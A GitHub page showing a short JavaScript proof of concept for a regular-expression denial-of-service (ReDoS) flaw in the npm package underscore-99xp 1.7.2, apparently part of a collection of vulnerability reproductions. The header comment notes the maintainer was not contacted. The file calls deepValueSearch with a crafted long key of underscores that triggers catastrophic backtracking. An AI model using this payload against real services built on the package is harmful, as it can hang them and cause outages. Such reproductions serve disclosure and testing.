Permalink
Cannot retrieve contributors at this time
18 lines (16 sloc)
1.03 KB
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
SaveResults/js/underscore-99xp.mjs /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * underscore-99xp 1.7.2 is vulnerable to ReDos | |
| * Package Manager: npm | |
| * Link to published package: https://github.com/brunnofoggia/underscore-99xp | |
| * Link to GitHub repo: https://github.com/brunnofoggia/underscore-99xp | |
| * Severity level: High | |
| * Module Description: Underscore-99xp is an extension based on experience of Underscore. | |
| * Additional Info: Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex (https://github.com/brunnofoggia/underscore-99xp/blob/a9b29cbb6093c543faff198236ea36f6a618bad1/lib/underscore-99xp.js#L181). | |
| * Contacted maintainer?: No | |
| * Open issue?: No | |
| * Steps to reproduce: you can execute the following command | |
| * node --experimental-modules underscore-99xp.mjs | |
| */ | |
| import _ from 'underscore-99xp'; | |
| var json = {_na_me_: '99_xp', _cont_acts_: [ {email: 'tea__m@99xp.org'} , {email: 'admin@99xp.org'} ]}; | |
| _.deepValueSearch('nonexistent[da____________________________________________________________________________________________________________ta][email]', json); |